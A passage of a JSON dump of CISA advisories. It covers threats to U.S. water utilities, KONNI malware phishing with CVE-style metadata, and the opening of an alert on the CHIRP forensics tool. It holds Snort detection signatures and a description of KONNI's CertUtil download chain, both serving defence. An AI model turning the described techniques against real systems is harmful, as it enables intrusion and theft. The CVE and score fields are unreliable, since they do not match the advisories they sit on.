"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-02-13T12:00:00", "type": "ics", "title": "DNS Infrastructure Hijacking Campaign", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-42475", "CVE-2022-47966"], "modified": "2019-02-13T12:00:00", "id": "AA19-024A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa19-024a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-23T07:01:58", "description": "### Summary\n\n_**Immediate Actions WWS Facilities Can Take Now to Protect Against Malicious Cyber Activity** \n\u2022 Do not click on [suspicious links](<https://us-cert.cisa.gov/ncas/tips/ST04-014>)._ \n_\u2022 If you use[ RDP](<https://www.ic3.gov/Media/Y2018/PSA180927>), secure and monitor it. \n\u2022 __Use [strong passwords](<https://us-cert.cisa.gov/ncas/tips/ST04-002>)._ \n\u2022 _Use [multi-factor authentication](<https://us-cert.cisa.gov/ncas/tips/ST05-012>)._\n\n__**Note:** This advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) framework, version 9. See the [ATT&CK for Enterprise](<https://attack.mitre.org/versions/v9/techniques/enterprise/>) for all referenced threat actor tactics and techniques.__\n\nThis joint advisory is the result of analytic efforts between the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Agency (CISA), the Environmental Protection Agency (EPA), and the National Security Agency (NSA) to highlight ongoing malicious cyber activity\u2014by both known and unknown actors\u2014targeting the information technology (IT) and operational technology (OT) networks, systems, and devices of [U.S. Water and Wastewater Systems (WWS) Sector facilities](<https://www.cisa.gov/water-and-wastewater-systems-sector>). This activity\u2014which includes attempts to compromise system integrity via unauthorized access\u2014threatens the ability of WWS facilities to provide clean, potable water to, and effectively manage the wastewater of, their communities. **Note:** although cyber threats across [critical infrastructure sectors](<https://www.cisa.gov/critical-infrastructure-sectors>) are increasing, this advisory does not intend to indicate greater targeting of the WWS Sector versus others.\n\nTo secure WWS facilities\u2014including Department of Defense (DoD) water treatment facilities in the United States and abroad\u2014against the TTPs listed below, CISA, FBI, EPA, and NSA strongly urge organizations to implement the measures described in the Recommended Mitigations section of this advisory.\n\nClick here for a PDF version of this report.\n\n### Technical Details\n\n### Threat Overview\n\n#### Tactics, Techniques, and Procedures\n\nWWS facilities may be vulnerable to the following common tactics, techniques, and procedures (TTPs) used by threat actors to compromise IT and OT networks, systems, and devices.\n\n * Spearphishing personnel to deliver malicious payloads, including ransomware [[T1566](<https://attack.mitre.org/versions/v9/techniques/T1566/>)]. \n * Spearphishing is one of the most prevalent techniques used for initial access to IT networks. Personnel and their potential lack of cyber awareness are a vulnerability within an organization. Personnel may open malicious attachments or links to execute malicious payloads contained in emails from threat actors that have successfully bypassed email filtering controls.\n * When organizations integrate IT with OT systems, attackers can gain access\u2014either purposefully or inadvertently\u2014to OT assets after the IT network has been compromised through spearphishing and other techniques.\n * Exploitation of internet-connected services and applications that enable remote access to WWS networks [[T1210](<https://attack.mitre.org/versions/v9/techniques/T1210/>)]. \n * For example, threat actors can exploit a Remote Desktop Protocol (RDP) that is insecurely connected to the internet to infect a network with ransomware. If the RDP is used for process control equipment, the attacker could also compromise WWS operations. Note: the increased use of remote operations due to the COVID-19 pandemic has likely increased the prevalence of weaknesses associated with remote access.\n * Exploitation of unsupported or outdated operating systems and software. \n * Threat actors likely seek to take advantage of perceived weaknesses among organizations that either do not have\u2014or choose not to prioritize\u2014resources for IT/OT infrastructure modernization. WWS facilities tend to allocate resources to physical infrastructure in need of replacement or repair (e.g., pipes) rather than IT/OT infrastructure.\n * The fact that WWS facilities are inconsistently resourced municipal systems\u2014not all of which have the resources to employ consistently high cybersecurity standards\u2014may contribute to the use of unsupported or outdated operating systems and software.\n * Exploitation of control system devices with vulnerable firmware versions. \n * WWS systems commonly use outdated control system devices or firmware versions, which expose WWS networks to publicly accessible and remotely executable vulnerabilities. Successful compromise of these devices may lead to loss of system control, denial of service, or loss of sensitive data [[T0827](<https://collaborate.mitre.org/attackics/index.php/Technique/T0827>)].\n\n#### WWS Sector Cyber Intrusions\n\nCyber intrusions targeting U.S. WWS facilities highlight vulnerabilities associated with the following threats:\n\n * Insider threats, from current or former employees who maintain improperly active credentials\n * Ransomware attacks\n\nWWS Sector cyber intrusions from 2019 to early 2021 include:\n\n * In August 2021, malicious cyber actors used Ghost variant ransomware against a California-based WWS facility. The ransomware variant had been in the system for about a month and was discovered when three supervisory control and data acquisition (SCADA) servers displayed a ransomware message.\n * In July 2021, cyber actors used remote access to introduce ZuCaNo ransomware onto a Maine-based WWS facility\u2019s wastewater SCADA computer. The treatment system was run manually until the SCADA computer was restored using local control and more frequent operator rounds.\n * In March 2021, cyber actors used an unknown ransomware variant against a Nevada-based WWS facility. The ransomware affected the victim\u2019s SCADA system and backup systems. The SCADA system provides visibility and monitoring but is not a full industrial control system (ICS).\n * In September 2020, personnel at a New Jersey-based WWS facility discovered potential Makop ransomware had compromised files within their system.\n * In March 2019, a former employee at Kansas-based WWS facility unsuccessfully attempted to threaten drinking water safety by using his user credentials, which had not been revoked at the time of his resignation, to remotely access a facility computer.\n\n### Mitigations\n\nThe FBI, CISA, EPA, and NSA recommend WWS facilities\u2014including DoD water treatment facilities in the United States and abroad\u2014use a risk-informed analysis to determine the applicability of a range of technical and non-technical mitigations to prevent, detect, and respond to cyber threats.\n\n#### WWS Monitoring\n\nPersonnel responsible for monitoring WWS should check for the following suspicious activities and indicators, which may be indicative of threat actor activity:\n\n * Inability of WWS facility personnel to access SCADA system controls at any time, either entirely or in part;\n * Unfamiliar data windows or system alerts appearing on SCADA system controls and facility data screens that could indicate a ransomware attack;\n * Detection by SCADA system controls, or by water treatment personnel, of abnormal operating parameters\u2014such as unusually high chemical addition rates\u2014used in the safe and proper treatment of drinking water;\n * Access of SCADA systems by unauthorized individuals or groups, e.g., former employees and current employees not authorized/assigned to operate SCADA systems and controls.\n * Access of SCADA systems at unusual times, which may indicate that a legitimate user\u2019s credentials have been compromised\n * Unexplained SCADA system restarts.\n * Unchanging parameter values that normally fluctuate.\n\n#### Remote Access Mitigations\n\nNote: The increased use of remote operations due to the COVID-19 pandemic increases the necessity for asset owner-operators to assess the risk associated with enhanced remote access to ensure it falls within acceptable levels. \n\n * Require multi-factor authentication for all remote access to the OT network, including from the IT network and external networks.\n * Utilize [blocklisting and allowlisting](<https://csrc.nist.gov/News/2015/NIST-Release-of-SP-800-167,-Guide-to-Application-W>) to limit remote access to users with a verified business and/or operational need.\n * Ensure that all remote access technologies have logging enabled and regularly audit these logs to identify instances of unauthorized access.\n * Utilize manual start and stop features in place of always activated unattended access to reduce the time remote access services are running.\n * Audit networks for systems using remote access services. \n * Close unneeded network ports associated with remote access services (e.g., RDP \u2013 Transmission Control Protocol [TCP] Port 3389).\n * When configuring [access control for a host](<https://csrc.nist.gov/publications/detail/sp/800-82/rev-2/final>), utilize custom settings to limit the access a remote party can attempt to acquire.\n\n#### Network Mitigations\n\n * Implement and ensure robust network segmentation between IT and OT networks to limit the ability of malicious cyber actors to pivot to the OT network after compromising the IT network. \n * Implement demilitarized zones (DMZs), firewalls, jump servers, and one-way communication diodes to prevent unregulated communication between the IT and OT networks.\n * Develop/update network maps to ensure a full accounting of all equipment that is connected to the network. \n * Remove any equipment from networks that is not required to conduct operations to reduce the attack surface malicious actors can exploit. \n\n#### Planning and Operational Mitigations\n\n * Ensure the organization\u2019s emergency response plan considers the full range of potential impacts that cyberattacks pose to operations, including loss or manipulation of view, loss or manipulation of control, and threats to safety. \n * The plan should also consider third parties with legitimate need for OT network access, including engineers and vendors.\n * Review, test, and update the emergency response plan on an annual basis to ensure accuracy.\n * Exercise the ability to fail over to alternate control systems, including manual operation while assuming degraded electronic communications.\n * Allow employees to gain decision-making experience via [tabletop exercises ](<https://www.cisa.gov/publication/cybersecurity-scenarios>)that incorporate loss of visibility and control scenarios. Utilize resources such as the Environment Protection Agency\u2019s (EPA) [Cybersecurity Incident Action Checklist](<https://www.epa.gov/waterriskassessment/epa-cybersecurity-best-practices-water-sector>) as well as the Ransomware Response Checklist on p. 11 of the [CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide](<https://www.cisa.gov/sites/default/files/publications/CISA_MS-ISAC_Ransomware Guide_S508C_.pdf>).\n\n#### Safety System Mitigations\n\n * Install independent cyber-physical safety systems. These are systems that physically prevent dangerous conditions from occurring if the control system is compromised by a threat actor. \n * Examples of cyber-physical safety system controls include: \n * Size of the chemical feed pump\n * Gearing on valves\n * Pressure switches, etc.\n * These types of controls benefit WWS Sector facilities\u2014especially smaller facilities with limited cybersecurity capability\u2014because they enable facility staff to assess systems from a worst-case scenario and determine protective solutions. Enabling cyber-physical safety systems allows operators to take physical steps to limit the damage, for example, by preventing cyber actors, who have gained control of a sodium hydroxide pump, from raising the pH to dangerous levels.\n\n### Additional Mitigations\n\n * Foster an organizational culture of cyber readiness. See the [CISA Cyber Essentials](<https://www.cisa.gov/publication/cyber-essentials-toolkits>) along with the items listed in the Resources section below for guidance. \n * Update software, including operating systems, applications, and firmware on IT network assets. Use a risk-based assessment strategy to determine which OT network assets and zones should participate in the patch management program. Consider using a centralized patch management system.\n * Set antivirus/antimalware programs to conduct regular scans of IT network assets using up-to-date signatures. Use a risk-based asset inventory strategy to determine how OT network assets are identified and evaluated for the presence of malware. \n * Implement regular data backup procedures on both the IT and OT networks. \n * Regularly test backups.\n * Ensure backups are not connected to the network to prevent the potential spread of ransomware to the backups.\n * When possible, enable OT device authentication, utilize the encrypted version of OT protocols, and encrypt all wireless communications to ensure the confidentiality and authenticity of process control data in transit.\n * Employ user account management to: \n * Remove, disable, or rename any default system accounts wherever possible.\n * Implement account lockout policies to reduce risk from brute-force attacks.\n * Monitor the creation of administrator-level accounts by third-party vendors with robust and privileged account management policies and procedures.\n * Implement a user account policy that includes set durations for deactivation and removal of accounts after employees leave the organization or after accounts reach a defined period of inactivity.\n * Implement data execution prevention controls, such as application allowlisting and software restriction policies that prevent programs from executing from common ransomware locations, such as temporary folders supporting popular internet browsers.\n * Train users through awareness and simulations to recognize and report phishing and social engineering attempts. Identify and suspend access of users exhibiting unusual activity.\n\nFBI, CISA, EPA, and NSA would like to thank Dragos as well as the WaterISAC for their contributions to this advisory.\n\n### Resources\n\n#### Cyber Hygiene Services\n\nCISA offers a range of no-cost [cyber hygiene services](<https://www.cisa.gov/cyber-hygiene-services>)\u2014including vulnerability scanning and ransomware readiness assessments\u2014to help critical infrastructure organizations assess, identify, and reduce their exposure to cyber threats. By taking advantage of these services, organizations of any size will receive recommendations on ways to reduce their risk and mitigate attack vectors. \n\n#### Rewards for Justice Reporting\n\nThe U.S. Department of State\u2019s Rewards for Justice (RFJ) program offers a reward of up to $10 million for reports of foreign government malicious activity against U.S. critical infrastructure. See the [RFJ website](<https://rewardsforjustice.net/english/malicious_cyber_activity.html>) for more information and how to report information securely.\n\n#### StopRansomware.gov \n\nThe [StopRansomware.gov](<https://www.cisa.gov/stopransomware>) webpage is an interagency resource that provides guidance on ransomware protection, detection, and response. This includes ransomware alerts, reports, and resources from CISA and other federal partners, including:\n\n * CISA and MS-ISAC: [Joint Ransomware Guide](<https://www.cisa.gov/sites/default/files/publications/CISA_MS-ISAC_Ransomware Guide_S508C.pdf>)\n * CISA Insights: [Ransomware Outbreak](<https://www.cisa.gov/blog/2019/08/21/cisa-insights-ransomware-outbreak-0>)\n * CISA Webinar: [Combating Ransomware](<https://www.youtube.com/watch?v=D8kC07tu27A>)\n\n### Additional Resources\n\nFor additional resources that can assist in preventing and mitigating this activity, see:\n\n * FBI-CISA-EPA-MS-ISAC Joint CSA: [Compromise of U.S. Water Treatment Facility](<https://us-cert.cisa.gov/ncas/alerts/aa21-042a>)\n * WaterISAC: [15 Cybersecurity Fundamentals for Water and Wastewater Utilities](<https://www.waterisac.org/fundamentals>)\n * American Water Works Association: [Cybersecurity Guidance and Assessment Tool](<https://www.awwa.org/Resources-Tools/Resource-Topics/Risk-Resilience/Cybersecurity-Guidance>)\n * EPA: [Cybersecurity Incident Action Checklist](<https://www.epa.gov/waterriskassessment/epa-cybersecurity-best-practices-water-sector>)\n * EPA: [Cybersecurity Best Practices for the Water Sector](<https://www.epa.gov/waterriskassessment/epa-cybersecurity-best-practices-water-sector>)\n * EPA: Supporting Cybersecurity Measures with the [Clean Water](<https://www.epa.gov/cwsrf>) and [Drinking Water](<https://www.epa.gov/dwsrf>) State Revolving Funds\n * CISA: [Cyber Risks & Resources for the Water and Wastewater Systems Sector](<https://www.cisa.gov/ncf-water>) infographic\n * CISA: [Critical ICS Cybersecurity Performance Goals and Objectives](<https://www.cisa.gov/control-systems-goals-and-objectives>)\n * CISA Fact Sheet: [Rising Ransomware Threat to Operational Technology Assets](<https://www.cisa.gov/publication/ransomware-threat-to-ot>)\n * CISA-MS-ISAC: [Joint Ransomware Guide](<https://www.cisa.gov/sites/default/files/publications/CISA_MS-ISAC_Ransomware Guide_S508C_.pdf>)\n * NSA CSA: [Stop Malicious Cyber Activity Against Connected OT](<https://media.defense.gov/2021/Apr/29/2002630479/-1/-1/1/CSA_STOP-MCA-AGAINST-OT_UOO13672321.PDF>)\n * CISA: [Insider Threat Mitigation Resources](<https://www.cisa.gov/publication/insider-threat-mitigation-resources>)\n * NIST: [Special Publication (SP) 800-167, Guide to Application Whitelisting](<https://csrc.nist.gov/News/2015/NIST-Release-of-SP-800-167,-Guide-to-Application-W>)\n * NIST: [SP 800-82 Rev. 2, Guide to Industrial Control Systems (ICS) Security (Section 6.2.1)](<https://csrc.nist.gov/publications/detail/sp/800-82/rev-2/final>)\n\n### Disclaimer of Endorsement \n\nThe information and opinions contained in this document are provided \"as is\" and without any warranties or guarantees. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government, and this guidance shall not be used for advertising or product endorsement purposes. \n\n\n### Contact Information\n\nTo report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field-offices](<https://www.fbi.gov/contact-us/field-offices>), or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. If you have any further questions related to this Joint Cybersecurity Advisory, or to request incident response resources or technical assistance related to these threats, contact CISA at [Central@cisa.dhs.gov](<mailto:Central@cisa.dhs.gov> \"Email CISA Central\" ).\n\n### Revisions\n\nInitial Version: October 14, 2021|October 25, 2021: Corrected typo in Additional Resources\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-25T12:00:00", "type": "ics", "title": "Ongoing Cyber Threats to U.S. Water and Wastewater Systems", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-42475", "CVE-2022-47966"], "modified": "2021-10-25T12:00:00", "id": "AA21-287A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-287a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-23T07:32:22", "description": "### Summary\n\n_This Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) framework. See the [ATT&CK for Enterprise](<https://attack.mitre.org/versions/v7/matrices/enterprise/>) framework for all referenced threat actor techniques._\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) has observed cyber actors using emails containing a Microsoft Word document with a malicious Visual Basic Application (VBA) macro code to deploy KONNI malware. KONNI is a remote administration tool (RAT) used by malicious cyber actors to steal files, capture keystrokes, take screenshots, and execute arbitrary code on infected hosts.\n\n### Technical Details\n\nKONNI malware is often delivered via phishing emails as a Microsoft Word document with a malicious VBA macro code (_Phishing: Spearphising Attachment_ [[T1566.001](<https://attack.mitre.org/versions/v7/techniques/T1566/001/>)]). The malicious code can change the font color from light grey to black (to fool the user to enable content), check if the Windows operating system is a 32-bit or 64-bit version, and construct and execute the command line to download additional files (_Command and Scripting Interpreter: Windows Command Shell_ [[T1059.003](<https://attack.mitre.org/versions/v7/techniques/T1059/003/>)]).\n\nOnce the VBA macro constructs the command line, it uses the certificate database tool CertUtil to download remote files from a given Uniform Resource Locator. It also incorporates a built-in function to decode base64-encoded files. The Command Prompt silently copies `certutil.exe` into a temp directory and renames it to evade detection.\n\nThe cyber actor then downloads a text file from a remote resource containing a base64-encoded string that is decoded by CertUtil and saved as a batch (.BAT) file. Finally, the cyber actor deletes the text file from the temp directory and executes the .BAT file.\n\n### MITRE ATT&CK Techniques\n\nAccording to MITRE, [KONNI](<https://attack.mitre.org/versions/v7/software/S0356/>) uses the ATT&CK techniques listed in table 1.\n\n_Table 1: KONNI ATT&CK techniques_\n\n**Technique** | **Use** \n---|--- \n \n_System Network Configuration Discovery_ [[T1016](<https://attack.mitre.org/versions/v7/techniques/T1016>)]\n\n| \n\nKONNI can collect the Internet Protocol address from the victim\u2019s machine. \n \n_System Owner/User Discovery_ [[T1033](<https://attack.mitre.org/versions/v7/techniques/T1033>)]\n\n| \n\nKONNI can collect the username from the victim\u2019s machine. \n \n_Masquerading: Match Legitimate Name or Location _[[T1036.005](<https://attack.mitre.org/versions/v7/techniques/T1036/005>)]\n\n| \n\nKONNI creates a shortcut called `Anti virus service.lnk `in an apparent attempt to masquerade as a legitimate file. \n \n_Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol _[[T1048.003](<https://attack.mitre.org/versions/v7/techniques/T1048/003>)]\n\n| \n\nKONNI has used File Transfer Protocol to exfiltrate reconnaissance data out. \n \n_Input Capture: Keylogging _[[T1056.001](<https://attack.mitre.org/versions/v7/techniques/T1056/001>)]\n\n| \n\nKONNI has the capability to perform keylogging. \n \n_Process Discovery _[[T1057](<https://attack.mitre.org/versions/v7/techniques/T1057>)]\n\n| \n\nKONNI has used `tasklist.exe` to get a snapshot of the current processes\u2019 state of the target machine. \n \n_Command and Scripting Interpreter: PowerShell _[[T1059.001](<https://attack.mitre.org/versions/v7/techniques/T1059/001>)]\n\n| \n\nKONNI used PowerShell to download and execute a specific 64-bit version of the malware. \n \n_Command and Scripting Interpreter: Windows Command Shell _[[T1059.003](<https://attack.mitre.org/versions/v7/techniques/T1059/003>)]\n\n| \n\nKONNI has used `cmd.exe` to execute arbitrary commands on the infected host across different stages of the infection change. \n \n_Indicator Removal on Host: File Deletion_ [[T1070.004](<https://attack.mitre.org/versions/v7/techniques/T1070/004>)]\n\n| \n\nKONNI can delete files. \n \n_Application Layer Protocol: Web Protocols _[[T1071.001](<https://attack.mitre.org/versions/v7/techniques/T1071/001>)]\n\n| \n\nKONNI has used Hypertext Transfer Protocol for command and control. \n \n_System Information Discovery _[[T1082](<https://attack.mitre.org/versions/v7/techniques/T1082>)]\n\n| \n\nKONNI can gather the operating system version, architecture information, connected drives, hostname, and computer name from the victim\u2019s machine and has used `systeminfo.exe` to get a snapshot of the current system state of the target machine. \n \n_File and Directory Discovery_ [[T1083](<https://attack.mitre.org/versions/v7/techniques/T1083>)]\n\n| \n\nA version of KONNI searches for filenames created with a previous version of the malware, suggesting different versions targeted the same victims and the versions may work together. \n \n_Ingress Tool Transfer_ [[T1105](<https://attack.mitre.org/versions/v7/techniques/T1105>)]\n\n| \n\nKONNI can download files and execute them on the victim\u2019s machine. \n \n_Modify Registry _[[T1112](<https://attack.mitre.org/versions/v7/techniques/T1112>)]\n\n| \n\nKONNI has modified registry keys of ComSysApp service and Svchost on the machine to gain persistence. \n \n_Screen Capture _[[T1113](<https://attack.mitre.org/versions/v7/techniques/T1113>)]\n\n| \n\nKONNI can take screenshots of the victim\u2019s machine. \n \n_Clipboard Data _[[T1115](<https://attack.mitre.org/versions/v7/techniques/T1115>)]\n\n| \n\nKONNI had a feature to steal data from the clipboard. \n \n_Data Encoding: Standard Encoding _[[T1132.001](<https://attack.mitre.org/versions/v7/techniques/T1132/001>)]\n\n| \n\nKONNI has used a custom base64 key to encode stolen data before exfiltration. \n \n_Access Token Manipulation: Create Process with Token_ [[T1134.002](<https://attack.mitre.org/versions/v7/techniques/T1134/002>)]\n\n| \n\nKONNI has duplicated the token of a high integrity process to spawn an instance of cmd.exe under an impersonated user. \n \n_Deobfuscate/Decode Files or Information_ [[T1140](<https://attack.mitre.org/versions/v7/techniques/T1140>)]\n\n| \n\nKONNI has used CertUtil to download and decode base64 encoded strings. \n \n_Signed Binary Proxy Execution: Rundll32_ [[T1218.011](<https://attack.mitre.org/versions/v7/techniques/T1218/011>)]\n\n| \n\nKONNI has used Rundll32 to execute its loader for privilege escalation purposes. \n \n_Event Triggered Execution: Component Object Model Hijacking _[[T1546.015](<https://attack.mitre.org/versions/v7/techniques/T1546/015>)]\n\n| \n\nKONNI has modified ComSysApp service to load the malicious DLL payload. \n \n_Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder _[[T1547.001](<https://attack.mitre.org/versions/v7/techniques/T1547/001>)]\n\n| \n\nA version of KONNI drops a Windows shortcut into the Startup folder to establish persistence. \n \n_Boot or Logon Autostart Execution: Shortcut Modification_ [[T1547.009](<https://attack.mitre.org/versions/v7/techniques/T1547/009>)]\n\n| \n\nA version of KONNI drops a Windows shortcut on the victim\u2019s machine to establish persistence. \n \n_Abuse Elevation Control Mechanism: Bypass User Access Control _[[T1548.002](<https://attack.mitre.org/versions/v7/techniques/T1548/002>)]\n\n| \n\nKONNI bypassed User Account Control with the \"AlwaysNotify\" settings. \n \n_Credentials from Password Stores: Credentials from Web Browsers _[[T1555.003](<https://attack.mitre.org/versions/v7/techniques/T1555/003>)]\n\n| \n\nKONNI can steal profiles (containing credential information) from Firefox, Chrome, and Opera. \n \n### Detection\n\n#### Signatures\n\nCISA developed the following Snort signatures for use in detecting KONNI malware exploits.\n\n`alert tcp any any -> any $HTTP_PORTS (msg:\"HTTP URI contains '/weget/*.php' (KONNI)\"; sid:1; rev:1; flow:established,to_server; content:\"/weget/\"; http_uri; depth:7; offset:0; fast_pattern; content:\".php\"; http_uri; distance:0; within:12; content:!\"Referrer|3a 20|\"; http_header; classtype:http-uri; priority:2; metadata:service http;)`\n\n`alert tcp any any -> any $HTTP_PORTS (msg:\"KONNI:HTTP header contains 'User-Agent|3a 20|HTTP|0d 0a|'\"; sid:1; rev:1; flow:established,to_server; content:\"User-Agent|3a 20|HTTP|0d 0a|\"; http_header; fast_pattern:only; content:\"POST\"; nocase; http_method; classtype:http-header; priority:2; metadata:service http;)`\n\n`alert tcp any any -> any $HTTP_PORTS (msg:\"KONNI:HTTP URI contains '/weget/(upload|uploadtm|download)'\"; sid:1; rev:1; flow:established,to_server; content:\"/weget/\"; http_uri; fast_pattern:only; pcre:\"/^\\/weget\\x2f(?:upload|uploadtm|download)\\.php/iU\"; content:\"POST\"; http_method; classtype:http-uri; priority:2; reference:url,blog.talosintelligence.com/2017/07/konni-references-north-korean-missile-capabilities.html; metadata:service http;)`\n\n### Mitigations\n\nCISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.\n\n * Maintain up-to-date antivirus signatures and engines. See [Protecting Against Malicious Code](<https://us-cert.cisa.gov/ncas/tips/ST18-271>).\n * Keep operating system patches up to date. See [Understanding Patches and Software Updates](<https://us-cert.cisa.gov/ncas/tips/ST04-006>).\n * Disable file and printer sharing services. If these services are required, use [strong passwords](<https://us-cert.cisa.gov/ncas/tips/ST04-002>) or Active Directory authentication.\n * Restrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators\u2019 group unless required.\n * Enforce a strong password policy. See [Choosing and Protecting Passwords](<https://us-cert.cisa.gov/ncas/tips/ST04-002>).\n * Exercise caution when opening email attachments, even if the attachment is expected and the sender appears to be known. See [Using Caution with Email Attachments](<https://us-cert.cisa.gov/ncas/tips/ST04-010>).\n * Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.\n * Disable unnecessary services on agency workstations and servers.\n * Scan for and remove suspicious email attachments; ensure the scanned attachment is its \"true file type\" (i.e., the extension matches the file header).\n * Monitor users' web browsing habits; restrict access to sites with unfavorable content.\n * Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs).\n * Scan all software downloaded from the internet prior to executing.\n * Maintain situational awareness of the latest threats and implement appropriate access control lists.\n * Visit the MITRE ATT&CK Techniques pages (linked in table 1 above) for additional mitigation and detection strategies.\n\nFor additional information on malware incident prevention and handling, see the National Institute of Standards and Technology Special Publication 800-83, \"[Guide to Malware Incident Prevention and Handling for Desktops and Laptops](<https://csrc.nist.gov/publications/detail/sp/800-83/rev-1/final>).\"\n\n### Resources\n\n * [d-hunter \u2013 A Look Into KONNI 2019 Campaign](<https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b%20>)\n * [MITRE ATT&CK \u2013 KONNI ](<https://attack.mitre.org/versions/v7/software/S0356/>)\n * [MITRE ATT&CK for Enterprise](<https://attack.mitre.org/versions/v7/matrices/enterprise/>)\n\n### Revisions\n\nAugust 14, 2020: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-24T12:00:00", "type": "ics", "title": "Phishing Emails Used to Deploy KONNI Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-42475", "CVE-2022-47966"], "modified": "2020-10-24T12:00:00", "id": "AA20-227A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-227a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-23T07:16:39", "description": "### Summary\n\n_**Updated April 15, 2021: The U.S. Government attributes this activity to the Russian Foreign Intelligence Service (SVR). Additional information may be found in a [statement from the White House](<https://www.whitehouse.gov/briefing-room/statements-releases/2021/04/15/fact-sheet-imposing-costs-for-harmful-foreign-activities-by-the-russian-government/>). For more information on SolarWinds-related activity, go to <https://us-cert.cisa.gov/remediating-apt-compromised-networks> and <https://www.cisa.gov/supply-chain-compromise>.**_\n\nThis Alert announces the CISA Hunt and Incident Response Program (CHIRP) tool. CHIRP is a forensics collection tool that CISA developed to help network defenders find indicators of compromise (IOCs) associated with activity detailed in the following CISA Alerts:\n\n * AA20-352A: [Advanced Persistent Threat Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations](<https://us-cert.cisa.gov/ncas/alerts/aa20-352a>), which primarily focuses on an advanced persistent threat (APT) actor\u2019s compromise of SolarWinds Orion products affecting U.S. government agencies, critical infrastructure entities, and private network organizations.\n * AA21-008A: [Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments](<https://us-cert.cisa.gov/ncas/alerts/aa21-008a>), which addresses APT activity within Microsoft 365/Azure environments and offers an overview of\u2014and guidance on\u2014available open-source tools. The Alert includes the [CISA-developed Sparrow tool ](<https://github.com/cisagov/Sparrow>)that helps network defenders detect possible compromised accounts and applications in the Azure/M365 environment.\n\nSimilar to [Sparrow](<https://github.com/cisagov/Sparrow>)\u2014which scans for signs of APT compromise within an M365 or Azure environment\u2014CHIRP scans for signs of APT compromise within an on-premises 